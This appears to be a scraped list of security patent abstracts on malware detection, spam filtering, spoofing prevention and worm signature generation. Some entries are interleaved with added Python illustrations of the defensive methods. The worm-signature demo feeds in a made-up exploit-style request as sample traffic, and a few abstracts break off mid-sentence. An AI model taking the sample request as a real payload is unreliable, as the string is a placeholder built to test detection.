20090064328 SYSTEM, APPARATUS AND METHOD OF MALWARE DIAGNOSIS MECHANISM BASED ON IMMUNIZATION DATABASE - An immunization system is provided, including: an immunization client apparatus which determines whether a target code is a malicious code by performing an immunization operation with respect to a first immunization signature and a code signature that is extracted from the target code, and reports the result of the determination to an immunization server; and the immunization server, which diagnoses whether the target code is the malicious code, updates a second immunization signature based on the reported result of the determination, and transmits to the immunization client apparatus an update message about the updated second immunization signature, wherein the immunization client apparatus updates the first immunization signature based on the received update message. 03-05-2009
20090064323 USE OF GLOBAL INTELLIGENCE TO MAKE LOCAL INFORMATION CLASSIFICATION DECISIONS - Methods and systems are provided for delaying local information classification until global intelligence has an opportunity to be gathered. According to one embodiment, an initial information identification process, e.g., an initial spam detection, is performed on received electronic information, e.g., an e-mail message. Based on the initial information identification process, classification of the received electronic information is attempted. If the received electronic information cannot be unambiguously classified as being within one of a set of predetermined categories (e.g., spam or clean), then an opportunity is provided for global intelligence to be gathered regarding the received electronic information by queuing the received electronic information for re-evaluation. The electronic information is subsequently classified by performing a re-evaluation information identification process, e.g., re-evaluation spam detection, which provides a more accurate categorization result than the initial information identification process. The electronic information is then handled in accordance with a policy associated with the categorization result. 03-05-2009
20090187988 CROSS-NETWORK REPUTATION FOR ONLINE SERVICES - A reputation server associates feedback from previous network transactions with an account of a user in a network. A reputation score for the user is calculated based on the feedback to indicate the probability the user will abuse the network. When an online service receives a request to perform a transaction from the user, the online service performs the transaction based on the user's reputation score. Additionally, a server generates a reputation packet including the reputation score for a user for use by an online service when the user requests the online service to perform a transaction. The online service may authenticate the reputation packet with the server and, if the reputation packet is authenticated, the online service performs the transaction based on the user's reputation score. 07-23-2009
20090187987 Learning framework for online applications - Learning to detect, and detecting, spam messages using a multi-stage combination of probability calculations based on individual and aggregate training sets of previously identified messages. During a preliminary phase, classifiers are trained, and lower and upper limit probabilities and a combined probability threshold are iteratively determined using a multi-stage combination of probability calculations based on minor and major subsets of messages previously categorized as valid or spam. During a live phase, a first stage classifier uses only a particular subset, and a second stage classifier uses a master set of previously categorized messages. If a newly received message cannot be categorized with certainty by the first stage classifier, and a computed first stage probability is within the previously determined lower and upper limits, first and second stage probabilities are combined. If the combined probability is greater than the previously determined combined probability threshold, the received message is marked as spam. 07-23-2009
20090144822 WITHHOLDING LAST PACKET OF UNDESIRABLE FILE TRANSFER - A system and method for disrupting the download of undesirable files. A data store traps the final block or blocks of a file transfer, which is held for detection of viruses, trojan horses, spyware, worms, dishonest ads, scripts, plugins, and other files considered computer contaminants. Innocuous file transfers are completed with minimum disruption as perceived by the user. 06-04-2009
20110225649 Protecting Computer Systems From Malicious Software - A method, computer program product, and apparatus for determining whether newly installed software is malicious software are presented. In one illustrative embodiment, software is installed on a computer system to produce newly installed software running in a secured part of the computer system. The newly installed software is only permitted to access a subset of resources in the computer system when running in the secured part. The newly installed software is run on the computer system until a selected event occurs. The newly installed software running on the computer system is monitored until the selected event occurs. The monitoring creates information used to evaluate the software for malicious behavior. The information is presented on a display to a user after the selected event has occurred, wherein the presented information comprises a recommendation of whether to provide the software access to the resources in the computer system outside the subset of resources. 09-15-2011
20090083853 METHOD AND SYSTEM PROVIDING EXTENDED AND END-TO-END DATA INTEGRITY THROUGH DATABASE AND OTHER SYSTEM LAYERS - Providing extended or end-to-end data integrity through layers of a system. In one aspect, information is to be transmitted between an application end of the system and a physical storage medium that stores the information for a database of the system, the information to be transmitted via a database server in a database server layer of the system. At least a portion of data protection is provided for the information, the data protection causing the information to be protected from corruption between a system layer and the physical storage medium, where the system layer is a separate layer provided closer to the application end of the system than the database server layer. 03-26-2009
20100269175 METHODS, SYSTEMS, AND MEDIA FOR MASQUERADE ATTACK DETECTION BY MONITORING COMPUTER USER BEHAVIOR - Methods, systems, and media for masquerade attack detection by monitoring computer user behavior are provided. In accordance with some embodiments, a method for detecting masquerade attacks is provided, the method comprising: monitoring a first plurality of user actions and access of decoy information in a computing environment; generating a user intent model for a category that includes at least one of the first plurality of user actions; monitoring a second plurality of user actions; comparing the second plurality of user actions with the user intent model by determining deviation from the generated user intent model; identifying whether the second plurality of user actions is a masquerade attack based at least in part on the comparison; and generating an alert in response to identifying that the second plurality of user actions is the masquerade attack and in response to determining that the second plurality of user actions includes accessing the decoy information in the computing environment. 10-21-2010
20090064329Zero-hour quarantine of suspect electronic messages - The zero-hour quarantine comprises a tool for flagging potentially harmful messages/files before an anti-virus signature has been published for a particular virus. The suspect file is sent to the zero-hour quarantine and periodically rescanned, giving time for creation of a signature file that would then detect the virus. An example method may include receiving and examining a message for attributes indicative of its undesirability, and assigning a threat score to the message. The method may comprise disposing of the message by comparing the threat score to first and second thresholds: the message is sent to a permanent quarantine if the threat score passes the first threshold, is sent to the zero-hour quarantine if the threat score does not pass the first threshold but passes the second threshold, or is delivered to the recipient if the threat score passes neither the first nor the second threshold.03-05-2009
20120079592IP PRIORITIZATION AND SCORING SYSTEM FOR DDOS DETECTION AND MITIGATION - A method and system to mitigate an attack over the Internet includes collecting information related to a plurality of client IP addresses from a plurality of sources and analyzing the collected information to determine confidence scores for the plurality of client IP addresses. The method and system also include receiving network traffic from the Internet and limiting network traffic from a first subset of the plurality of client IP addresses characterized by a confidence score less than a first threshold. The method and system further include determining a level of the network traffic and limiting network traffic from a second subset of the plurality of client IP addresses characterized by a confidence score less than a second threshold greater than the first threshold.03-29-2012
20120079591Data Filtering for Communication Devices - Technologies are generally described for data filtering for communication devices. In one example, a method of receiving data from a data source on a communication device is disclosed. The method includes determining, at the communication device, a domain name of the data source. The method also includes determining, at the communication device, one or more communication networks the communication device is connected to. The method further includes processing, at the communication device, the domain name for acceptance based on the one or more connected communication networks. The method also includes receiving the data from the data source, at the communication device, if the domain name is accepted.03-29-2012
20090241187METHOD AND SYSTEM FOR PROTECTION AGAINST INFORMATION STEALING SOFTWARE - A system and method for identifying infection of an electronic device by unwanted software is disclosed. A software agent configured to generate a bait is installed on the electronic device. The bait can simulate a situation in which the user performs a login session and submits personal information, or it may simply contain artificial sensitive information. Parameters may be inserted into the bait, such as the identity of the electronic device on which the bait is installed. The output of the electronic device is monitored and analyzed for attempts to transmit the bait. The output is analyzed by correlating it with the bait, which can be done by comparing information about the bait with the traffic over a computer network in order to decide on the existence and the location of unwanted software. Furthermore, it is possible to store information about the bait in a database and then compare information about a user with the information in the database in order to determine whether the electronic device that transmitted the bait contains unwanted software.09-24-2009
20090083852Whitelist and Blacklist Identification Data - Aspects of the subject matter described herein relate to identifying good files and malware based on whitelists and blacklists. In aspects, a node starts a scan of files on a data store. In conjunction with starting the scan, the node creates a data structure that indicates the directories on the data store. The node sends the data structure to a whitelist server and a blacklist server and an indication of a last successful time of communication. The whitelist and blacklist servers respond to the node with information about any new files that have been added to the directories since the last successful communication. The node may subsequently use the information to identify known good files and malware.03-26-2009
20080263663ANOMALY DETECTION BASED ON DIRECTIONAL DATA - Properly detects an anomaly on the basis of directional data that are obtained in sequence from a monitored object. An anomaly detecting method includes: sequentially generating directional data indicating a feature of each piece of monitored data correspondingly to the monitored data which are input in sequence; calculating the dissimilarity of the directional data to a reference vector; updating a moment of the distribution of the dissimilarity appearing when the directional data is modeled with a multi-dimensional probability distribution, based on the moment already corresponding to the monitored data; calculating a parameter determining the variance of the multi-dimensional probability distribution, on the basis of the moment; calculating a threshold of the dissimilarity on the basis of the multi-dimensional probability distribution the variance of which is determined by the parameter; and detecting an anomaly in the monitored data that corresponds to the dissimilarity if the dissimilarity exceeds the threshold.10-23-2008
20080263661DETECTING ANOMALIES IN SIGNALING FLOWS - The present invention relates to a method of detecting anomalies in signaling flows in a communication device connected to a database. In accordance with the method, a communication device receives (10-23-2008
20080263659SYSTEM AND METHOD FOR DETECTING MALICIOUS MOBILE PROGRAM CODE - A system and method of detecting malware. A program file is received and analysis performed to identify URLs embedded in the program file. The URLs are categorized as a function of a URL filter database and a malware probability is assigned to each URL identified. A decision is made on how to dispose of the program file as a function of the malware probability of one or more of the URLs identified. In one example approach, a malware type is also assigned to the program file as a function of one or more of the URLs identified.10-23-2008
20080263660Method, Device and Program for Detection of Address Spoofing in a Wireless Network - The invention relates to a method, device and program for detection of address spoofing in a wireless network. According to the invention, a sensor is installed in order to capture frames transmitted over the wireless network which have an address field comprising an address of a network access point. The captured frames are analyzed in order to establish a list of stations that are associated with the access point. Another list of stations associated with the access point is obtained from the latter. The two station lists are compared in order to detect possible access point address spoofing.10-23-2008
20080263662SYSTEM AND METHOD FOR FUZZY MULTI-LEVEL SECURITY - An access control system and method includes a risk index module which computes a risk index for each dimension contributing to risk. A boundary range is defined for a parameter representing each risk index such that a parameter value above the range is unacceptable, a value below the range is acceptable, and a value within the range is acceptable with mitigation measures. A mitigation module determines the mitigation measures which bring the parameter down to within the range.10-23-2008
20110231931METHOD AND DEVICE FOR PREVENTING DOMAIN NAME SYSTEM SPOOFING - A method for preventing Domain Name System (DNS) spoofing includes: performing uppercase/lowercase conversion for letters of a DNS question field in a DNS request packet according to a preset rule; sending the DNS request packet; receiving a DNS response packet; obtaining uppercase/lowercase distribution of the letters of the DNS question field in the DNS response packet; and forwarding the DNS response packet to a target DNS client if the uppercase/lowercase distribution of the letters of the DNS question field in the DNS response packet complies with the preset rule. Corresponding to the method, a device for preventing DNS spoofing is disclosed. The method and device reduce occupation of storage resources of the device.09-22-2011
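The case-randomization check described in the abstract above is easy to get wrong in the verification step, so here is an added worked example (not the patent's own code). It assumes the "preset rule" is a keyed HMAC over the transaction ID and the lowercased question name, so the resolver keeps no per-query state, which is the storage saving the abstract mentions. Names are assumed to be ASCII; the secret, transaction ID and domain names are constructed for the example.

```python
import hashlib
import hmac


def case_pattern(secret: bytes, txid: int, qname: str) -> list:
    """One bit per letter of qname, derived from HMAC(secret, txid || lowercase qname).

    Assumed rule for illustration: the abstract only says the conversion
    follows "a preset rule". Keying it on the transaction ID and a secret
    means nothing has to be stored per outstanding query.
    """
    msg = txid.to_bytes(2, "big") + qname.lower().encode("ascii")
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    bits = []
    letter_index = 0
    for ch in qname:
        if ch.isalpha():
            byte = digest[(letter_index // 8) % len(digest)]
            bits.append(bool((byte >> (letter_index % 8)) & 1))
            letter_index += 1
    return bits


def encode_question(secret: bytes, txid: int, qname: str) -> str:
    """Apply the case pattern to the question name before sending the request."""
    pattern = iter(case_pattern(secret, txid, qname))
    out = []
    for ch in qname:
        if ch.isalpha():
            out.append(ch.upper() if next(pattern) else ch.lower())
        else:
            out.append(ch)
    return "".join(out)


def response_is_genuine(secret: bytes, txid: int, response_qname: str) -> bool:
    """Forward the response only if the echoed question name carries exactly
    the case pattern generated for this transaction ID.

    A forged response built from the lowercase name an attacker guessed has a
    1-in-2**n chance of matching, n being the number of letters in the name.
    """
    return encode_question(secret, txid, response_qname) == response_qname


if __name__ == "__main__":
    key = b"resolver-secret"      # assumed per-device secret
    txid = 0x1A2B                 # constructed transaction ID
    sent = encode_question(key, txid, "www.example.com.")
    print("sent   :", sent)
    print("genuine:", response_is_genuine(key, txid, sent))
    forged = sent.swapcase()
    print("forged :", forged, "->", response_is_genuine(key, txid, forged))
```

The check only works against upstream servers and forwarders that echo the question name case-preserved; one that lowercases it makes every legitimate answer fail the check, so a deployment needs a fallback for such servers. The extra bits complement, rather than replace, transaction ID and source port randomization.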
20100154056Context-Aware Real-Time Computer-Protection Systems and Methods - A computer-implemented method for determining, in response to an event of interest, whether to perform a real-time file scan by examining the full context of the event of interest may comprise: 1) detecting an event of interest, 2) identifying at least one file associated with the event of interest, 3) accessing contextual metadata associated with the event of interest, 4) accessing at least one rule that comprises criteria for determining, based on the event of interest and the contextual metadata, whether to perform a security scan on the file, and then 5) determining, by applying the rule, whether to perform the security scan on the file. Corresponding systems and computer-readable media are also disclosed.06-17-2010
20090106836Equipment Monitoring Device - An equipment monitoring server is provided to prevent wrong acts in a local area network. An equipment monitoring server 04-23-2009
20090106837Module for Controlling Integrity Properties of a Data Stream - A module for controlling integrity properties of a data stream input into a device, such as a machine for manufacturing or a management system related to such machines. A plurality of control items are registered in a database. At least one activable control means executes a control of one integrity property according to one of several registered control items. A list is attached to the database with selectable links for activating at least one of the control means. Configuration means perform on at least one of the links a chronological selection according to a predefined management profile on integrity properties of the data stream in order to introduce a selectable relative time delay between activations of control items. Due to that configuration, the integrity control thus obtained is provided with high reliability as well as in a very flexible manner.04-23-2009
20090249482METHOD AND SYSTEM FOR DETECTING RESTRICTED CONTENT ASSOCIATED WITH RETRIEVED CONTENT - In embodiments of the present invention improved capabilities are described for contextual information caused to be attached to data as it passes through a series of computing devices, the contextual information relating to the series of computing devices. The data and the contextual information may then be scanned to determine if the data is a target data. In response to the identification of a target data, the contextual information may be communicated to a central repository. The contextual information may then be analyzed in relation to other information stored in the central repository to determine a target source.10-01-2009
20090205044APPARATUS, SYSTEM, AND METHOD FOR SECURE HARD DRIVE SIGNED AUDIT - An apparatus, system, and method are disclosed for secure hard disk signed audit. The apparatus is provided with a plurality of modules configured to functionally execute the necessary steps of monitoring interactions with an audited system, detecting an interrupt event corresponding to an auditable interaction, and logging an audit record for the auditable interaction in response to the interrupt event, wherein the audit record is logged in an access-restricted portion of a portion-securable hard disk. These modules in the described embodiments include a gate module, a detection module, and a logging module.08-13-2009
20090249483Command and Control Systems for Cyber Warfare - According to one embodiment, a method includes receiving data regarding a plurality of first parameters of a network. Each first parameter is mapped to a respective second parameter of a computer-readable cyber battle management language. The computer-readable cyber battle management language is operable to express an operational order in the form of a text-based instruction having a computational grammatical structure. The operational order is to be executed at least partially within the network and is related to cyber warfare. The computer-readable battle management language is also operable to express a situation report related to cyber warfare. The situation report is expressed in terms of one or more of the second parameters. The situation report may describe a change in one or more of the first parameters.10-01-2009
20090249481BOTNET SPAM DETECTION AND FILTRATION ON THE SOURCE MACHINE - A method and device are disclosed. In one embodiment the method includes determining that a packet attempting to be sent from a first computer system has at least a portion of a human communication message that may contain spam. The method then increments a spam counter when the difference in time between a first time value in a time stamp within the packet and a second time value of a most recent activity from a human input device coupled to the first computer system is greater than a threshold difference in time value. The method also disallows the packet to be sent to a remote location if the spam counter exceeds a spam outbound threshold value.10-01-2009
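An added example (not the patent's own code) of the source-side correlation the abstract above describes: a packet that looks like a human message, sent long after the last human input, bumps a counter, and sends are refused once the counter passes a threshold. The message heuristic (a Subject header or an SMTP DATA command), the idle threshold, the counter limit and the event stream are all assumptions constructed for the example.

```python
import re

# Assumed heuristic for "a portion of a human communication message".
SUBJECT_HEADER = re.compile(rb"^Subject:", re.MULTILINE)


class OutboundSpamGuard:
    """Counts message sends that occur with no recent human input."""

    def __init__(self, idle_threshold: float = 120.0, spam_threshold: int = 3):
        self.idle_threshold = idle_threshold    # seconds since last keyboard/mouse event
        self.spam_threshold = spam_threshold    # sends allowed before blocking
        self.last_input = None                  # timestamp of most recent HID event
        self.spam_counter = 0

    def human_input(self, ts: float) -> None:
        """Record activity from a keyboard, mouse or similar input device."""
        self.last_input = ts

    @staticmethod
    def looks_like_message(payload: bytes) -> bool:
        return bool(SUBJECT_HEADER.search(payload)) or payload.startswith(b"DATA")

    def allow(self, packet_ts: float, payload: bytes) -> bool:
        """True if the packet may leave the host, False if it is held."""
        if not self.looks_like_message(payload):
            return True
        idle = float("inf") if self.last_input is None else packet_ts - self.last_input
        if idle > self.idle_threshold:
            self.spam_counter += 1
        return self.spam_counter <= self.spam_threshold


def run_demo():
    """Constructed event stream: (kind, timestamp, payload)."""
    guard = OutboundSpamGuard(idle_threshold=120.0, spam_threshold=3)
    events = [
        ("hid", 1000.0, None),
        ("send", 1005.0, b"Subject: lunch?\r\n\r\nsee you at noon"),  # 5 s after typing
        ("send", 1010.0, b"GET /index.html HTTP/1.1\r\n"),            # not a message
        ("send", 2000.0, b"Subject: cheap meds\r\n\r\n..."),          # idle 1000 s, count 1
        ("send", 2001.0, b"Subject: cheap meds\r\n\r\n..."),          # count 2
        ("send", 2002.0, b"Subject: cheap meds\r\n\r\n..."),          # count 3, still allowed
        ("send", 2003.0, b"Subject: cheap meds\r\n\r\n..."),          # count 4, blocked
        ("hid", 2100.0, None),
        ("send", 2101.0, b"Subject: re: lunch\r\n\r\nok"),            # counter has latched
    ]
    decisions = []
    for kind, ts, payload in events:
        if kind == "hid":
            guard.human_input(ts)
        else:
            decisions.append(guard.allow(ts, payload))
    return decisions, guard.spam_counter
```

The last event shows the failure mode of a counter that only ever increments: once it trips, the returning user is blocked too. A real implementation needs a decay or reset policy and a way to tell the user, and it must also be told that scripted input (an attacker replaying fake HID events) defeats the idle measurement.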
20090260081System and Method for Monitoring and Securing a Baseboard Management Controller - In certain embodiments, a method for monitoring and securing a baseboard management processor is provided. The method includes coupling to a baseboard management controller of a computer system via a console port, maintaining a persistent connection to the baseboard management controller, monitoring data from the console port, determining from the data whether an unauthorized access has occurred, and sending an alert if the unauthorized access has occurred.10-15-2009
20090260082Signature based authentication of the configuration of a configurable logic component - A configurable logic component is shown with a signature generator, responsive to a commanded configuration information signal from a processor, for providing a signed commanded configuration information signal, and with a memory device, responsive to the signed commanded configuration information signal from the signature generator, for storing the signed commanded configuration information signal in the configurable logic component for use by the processor in checking a current configuration of the configurable logic component against a trusted signed configuration file to ensure the current configuration matches the commanded configuration and allowing use of the configurable logic component in case of a match.10-15-2009
20090260080SYSTEM AND METHOD FOR VERIFICATION OF DOCUMENT PROCESSING DEVICE SECURITY BY MONITORING STATE TRANSITIONS - The subject application is directed to a system and method for verification of document processing device security by monitoring of state transitions. State data is first acquired corresponding to a monitored sequence of states entered by a document processing device during operations and stored in an associated data storage. Authenticity data is thereafter generated representing the authenticity of the stored state data. State template data is then stored in the associated data storage corresponding to at least one acceptable sequence of states. Destination data is also stored in the associated data storage representing at least one preselected notification destination. A comparison is then performed of the acquired state data and the state template data. Notification data is then output based upon the result of the comparison of the state data and the state template data.10-15-2009
20100037314METHOD AND SYSTEM FOR DETECTING MALICIOUS AND/OR BOTNET-RELATED DOMAIN NAMES - A method and system of detecting a malicious and/or botnet-related domain name, comprising: reviewing a domain name used in Domain Name System (DNS) traffic in a network; searching for information about the domain name, the information related to: information about the domain name in a domain name white list and/or a domain name suspicious list; and information about the domain name using an Internet search engine, wherein the Internet search engine determines if there are no search results or search results with a link to at least one malware analysis site; and designating the domain name as malicious and/or botnet-related based on the information.02-11-2010
20110145920SYSTEM AND METHOD FOR ADVERSE MOBILE APPLICATION IDENTIFICATION - A system and method identifies mobile applications that can have an adverse effect on a mobile device or mobile network. In an implementation, a server monitors behavioral data relating to a mobile application and applies a model to determine if the application has an adverse effect or has the potential to cause an adverse effect on a mobile device or a network the mobile device may connect to. A mobile device may monitor behavioral data, apply a model to the data, and transmit a disposition to the server. The server may aggregate behavioral data or disposition information from multiple devices. The server may transmit or make available the disposition information to a subscriber through a web interface, API, email, or other mechanism. After identifying that an application may have an adverse effect, the server may enact corrective actions, such as generating device or network configuration data.06-16-2011
20110145919METHOD AND APPARATUS FOR ENSURING CONSISTENT SYSTEM CONFIGURATION IN SECURE APPLICATIONS - In exemplary embodiments, methods and apparatuses for securing electronic devices against tampering or unauthorized modifications are presented herein. One or more system locks may be installed in the system at a location between two or more subsystems along a communications path. Each system lock may be associated with a particular subsystem. The system locks may monitor the state of the system, including transactions targeting associated subsystems, and the transactions and/or state of the system may be compared to known valid transactions and states. If the requested transaction or enacted system state differs from a known acceptable transaction or state, a notification may be generated and countermeasures may be enacted. In some embodiments, the system locks may be located in a system bus on an electronic device to ensure that software executed on the electronic device remains free of tampering.06-16-2011
20110145918SENSITIVE DATA TRACKING USING DYNAMIC TAINT ANALYSIS - A system and method for tracking sensitive data uses dynamic taint analysis to track sensitive data as the data flows through a target application running on a computer system. In general, the system and method for tracking sensitive data marks data as tainted when the data input to the target application is indicated as sensitive. The system and method may then track the propagation of the tainted data as the data is read from and written to memory by the target application to detect if the tainted data is output from the application (e.g., leaked). Dynamic binary translation may be used to provide binary instrumentation of the target application for dynamic taint analysis to track propagation of the tainted data at the instruction level and/or the function level. Of course, many alternatives, variations, and modifications are possible without departing from this embodiment.06-16-2011
20090144821AUXILIARY METHOD FOR INVESTIGATING LURKING PROGRAM INCIDENTS - An auxiliary method for investigating lurking program incidents is disclosed. The method keeps monitoring a plurality of processes run by a computer system and saves process-invoking relationship data for each monitored process when the process is created and when it is terminated. Simultaneously, the system registry database of the computer system is also monitored and the autostart-registered data of programs is saved. The process-invoking relationship data is then correlated with the autostart-registered data to generate and save a process-invoking relationship log, from which high-level crucial clues about suspicious lurking programs are extracted and saved. By the present method, only a small amount of high-level crucial clues and process-invoking relationship log entries is collected and few system resources are consumed, while clear evidence helpful to the investigation of lurking program incidents is provided. Thus the cost in time and labor of collecting and analyzing large amounts of low-level logs is saved.06-04-2009
20080313733Optimization of Distributed Anti-Virus Scanning - Techniques for optimizing distributed anti-virus (AV) scanning are described. In one implementation, a message is received into a multi-node network that includes a plurality of distributed scanning tools. An acceptable scanning policy threshold is determined that is representative of a plurality of individual scanning policy configurations of the plurality of scanning tools. A determination is made whether the message has previously been scanned to the acceptable scanning policy threshold based on a single valued element. If the message has been previously scanned, the message is allowed to be communicated. Otherwise, the message is scanned at the acceptable scanning policy threshold. If the scanning is successful, then the message is marked as having been scanned, and is allowed to be communicated. If the scanning is unsuccessful, the message is prevented from being communicated.12-18-2008
20100162390Automatic proactive means and methods for substantially defeating a password attack - Automatic proactive means and methods for substantially defeating a password attack against a computer having a password-protected program installed in it. These means and methods range from not responding at all, to responding with instructions to disrupt the ability of the computer having the attack program in it to continue the attack.06-24-2010
20090260083SYSTEM AND METHOD FOR SOURCE IP ANTI-SPOOFING SECURITY - A system and method that uses source IP addresses and MAC addresses in a network to provide security against attempts by users of the network to use false source IP addresses in data packets. The system and method analyze MAC addresses and source IP addresses at the datalink (layer 2) level, and use the information derived from such analysis to block access through a port where a host device is using a false, or spoofed, source IP address in transmitted data packets. Further, the system and method validate initially learned source IP addresses and determine whether the number of unsuccessful attempts to validate new source IP addresses exceeds a threshold level; where the number does exceed the threshold, the system and method can operate in a possible-attack mode.10-15-2009
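An added example (not the patent's own code) of the per-port binding logic in the abstract above: a (MAC, IP) pair is learned on a port only after validation, frames matching a learned pair are forwarded, an unvalidated pair cuts off the port, and the count of failed validations drives a possible-attack mode. The abstract does not say how validation is done; here `validate(mac, ip)` is an assumed hook backed by a constructed DHCP-style lease table, and the frames are constructed as well.

```python
from collections import defaultdict


class SourceIpGuard:
    """Layer-2 source-IP anti-spoofing filter keyed on (port, MAC, IP)."""

    def __init__(self, validate, failure_threshold: int = 3):
        self.validate = validate                    # assumed hook: validate(mac, ip) -> bool
        self.failure_threshold = failure_threshold
        self.bindings = defaultdict(set)            # port -> {(mac, ip)} validated pairs
        self.blocked_ports = set()
        self.failed_validations = 0
        self.attack_mode = False

    def filter_frame(self, port: int, src_mac: str, src_ip: str) -> str:
        """Return "forward" or "drop" for one inbound frame seen on `port`."""
        if port in self.blocked_ports:
            return "drop"
        if (src_mac, src_ip) in self.bindings[port]:
            return "forward"                        # fast path for learned pairs
        if self.validate(src_mac, src_ip):
            self.bindings[port].add((src_mac, src_ip))
            return "forward"
        # Unvalidated new source address: treat as spoofed, block the port,
        # and count the failure toward the attack-mode threshold.
        self.blocked_ports.add(port)
        self.failed_validations += 1
        if self.failed_validations >= self.failure_threshold:
            self.attack_mode = True
        return "drop"


def run_demo():
    """Constructed frames (port, src MAC, src IP) against a constructed lease table."""
    leases = {"aa:aa:aa:aa:aa:01": "10.0.0.10",
              "aa:aa:aa:aa:aa:02": "10.0.0.20"}
    guard = SourceIpGuard(validate=lambda mac, ip: leases.get(mac) == ip)
    frames = [
        (1, "aa:aa:aa:aa:aa:01", "10.0.0.10"),   # matches lease: learned, forwarded
        (1, "aa:aa:aa:aa:aa:01", "10.0.0.10"),   # cached binding
        (1, "aa:aa:aa:aa:aa:01", "10.0.0.99"),   # same host, forged source IP
        (1, "aa:aa:aa:aa:aa:01", "10.0.0.10"),   # port now blocked, even for the real address
        (2, "aa:aa:aa:aa:aa:02", "10.0.0.20"),   # another port, valid
        (3, "aa:aa:aa:aa:aa:03", "10.0.0.77"),   # unknown MAC claiming an address
        (4, "aa:aa:aa:aa:aa:04", "10.0.0.88"),   # third failure: attack mode
    ]
    decisions = [guard.filter_frame(*frame) for frame in frames]
    return decisions, guard
```

Blocking the whole port on the first failure matches the abstract but also cuts off a legitimate host sharing that port (frame four), so a deployment on shared segments would rather drop only the offending (MAC, IP) pair and keep the port-level block for repeat offenders.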
20090260079INFORMATION PROCESSING DEVICE, AND METHOD THEREFOR - To provide an information processing device that can perform highly accurate tampering detection of distinguishing between an alteration by an administrator and significant tampering. The information processing device acquires content from a web server in accordance with an acquisition request for the content by a browser terminal. The information processing device includes: a conversion unit (10-15-2009
20080307524Detecting Public Network Attacks Using Signatures and Fast Content Analysis - Network worms or viruses are a growing threat to the security of public and private networks and the individual computers that make up those networks. A content sifting method is provided that automatically generates a precise signature for a worm or virus that can then be used to significantly reduce the propagation of the worm elsewhere in the network or eradicate the worm altogether. The content sifting method is complemented by a value sampling method that increases the throughput of network traffic that can be monitored. Together, the methods track the number of times invariant strings appear in packets and the network address dispersion of the packets containing those strings. When an invariant string reaches a particular threshold of appearances and address dispersion, the string is reported as a signature for a suspected worm.12-11-2008
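An added example (not the patent's own code) of the content sifting and value sampling described in the abstract above, run over constructed traffic. Every fixed-length substring of each payload is counted together with the set of source and destination addresses it was seen between; a substring becomes a signature only when both prevalence and address dispersion pass their thresholds, and adjacent qualifying windows are merged into one invariant byte run. The 8-byte window, the thresholds, CRC32 as the sampling hash and the sample payloads are assumptions for the example.

```python
import zlib
from collections import defaultdict


class ContentSifter:
    """Prevalence plus address-dispersion tracking of payload substrings."""

    def __init__(self, window=8, prevalence=4, dispersion=4, sample_mod=1):
        self.window = window
        self.prevalence = prevalence        # packets a substring must appear in
        self.dispersion = dispersion        # distinct sources AND destinations required
        self.sample_mod = sample_mod        # 1 tracks everything; N tracks about 1/N of substrings
        self.count = defaultdict(int)
        self.sources = defaultdict(set)
        self.destinations = defaultdict(set)
        self.reported = set()

    def _sampled(self, sub: bytes) -> bool:
        # Value sampling: the decision depends only on the substring's bytes, so
        # a given substring is consistently tracked (or skipped) in every packet.
        return zlib.crc32(sub) % self.sample_mod == 0

    def _qualifies(self, sub: bytes) -> bool:
        return (self.count[sub] >= self.prevalence
                and len(self.sources[sub]) >= self.dispersion
                and len(self.destinations[sub]) >= self.dispersion)

    def observe(self, src: str, dst: str, payload: bytes) -> list:
        """Update counters with one packet; return newly found signatures."""
        hits = []
        counted = set()
        for i in range(len(payload) - self.window + 1):
            sub = payload[i:i + self.window]
            if not self._sampled(sub):
                continue
            if sub not in counted:          # count a substring once per packet
                counted.add(sub)
                self.count[sub] += 1
                self.sources[sub].add(src)
                self.destinations[sub].add(dst)
            if self._qualifies(sub):
                hits.append(i)
        return self._merge(payload, hits)

    def _merge(self, payload: bytes, offsets: list) -> list:
        """Merge overlapping qualifying windows into maximal invariant runs."""
        runs = []
        start = end = None
        for off in offsets:                 # ascending by construction
            if start is None:
                start, end = off, off + self.window
            elif off <= end:
                end = off + self.window
            else:
                runs.append(payload[start:end])
                start, end = off, off + self.window
        if start is not None:
            runs.append(payload[start:end])
        new = [r for r in runs if r not in self.reported]
        self.reported.update(new)
        return new


# Constructed payloads: an invariant worm request and a benign server banner.
WORM = b"GET /cgi-bin/vuln.cgi?cmd=EXPLOIT_PAYLOAD_0x41414141 HTTP/1.0\r\n"
BANNER = b"220 mail.example.test ESMTP ready\r\n"


def run_demo() -> list:
    """One server sends the banner to six clients (high prevalence, one source);
    five distinct host pairs carry the worm behind differing junk prefixes."""
    sifter = ContentSifter()
    packets = [("10.0.9.9", f"10.0.1.{k}", BANNER) for k in range(6)]
    packets += [(f"10.0.{k}.1", f"10.1.{k}.2", bytes([k, 0xFF, k]) + WORM)
                for k in range(5)]
    found = []
    for src, dst, payload in packets:
        found.extend(sifter.observe(src, dst, payload))
    return found
```

The banner is seen more often than the worm yet is never reported, because all copies come from one source; prevalence alone would flag every popular download. With `sample_mod` above 1 the tracker touches far fewer substrings per packet, at the cost of needing a longer invariant run before a sampled substring is guaranteed to fall inside it.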
20080307525SYSTEM AND METHOD FOR EVALUATING SECURITY EVENTS IN THE CONTEXT OF AN ORGANIZATIONAL STRUCTURE - A system and method is provided for evaluating security threats to an enterprise network. The relative severities of security threats are determined, based in part, on the context of each threat within the enterprise network and in relation to the operation of a business. As a result, it is possible to prioritize security threats having the greatest magnitude and also threats that are directed against the most valuable business network devices. The invention comprises a plurality of network agents operating on a plurality of network devices for generating event messages. The event messages contain security data and are forwarded to an event manager for analysis. The event manager comprises an event correlator and an asset context manager. The event correlator detects security threats from the interrelationships between the security data contained in the event messages. In addition, the asset context manager utilizes business context knowledge specific to a particular business or business unit to determine a threat priority based on the importance of the threatened network device to the operation of the business.12-11-2008
20100175129METHOD FOR NOTIFICATION UPON EXPOSURE TO OFFENSIVE BEHAVIOURAL PATTERNS IN COLLABORATION - A system and method for protecting a user from offensive behavior in communications and notifying the user and/or an enforcement entity of the offensive behavior. The offensive content analysis system monitors communications between users for offensive behavior. The offensive content analysis system may measure the level of current offense in the communication and determine a historical offensive behavior pattern for the user. The offensive content analysis system may then determine if the offensive behavior, both current and historical, rises to a threshold behavior level. The offensive content analysis system may take notification action if the offensive behavior meets the threshold level.07-08-2010
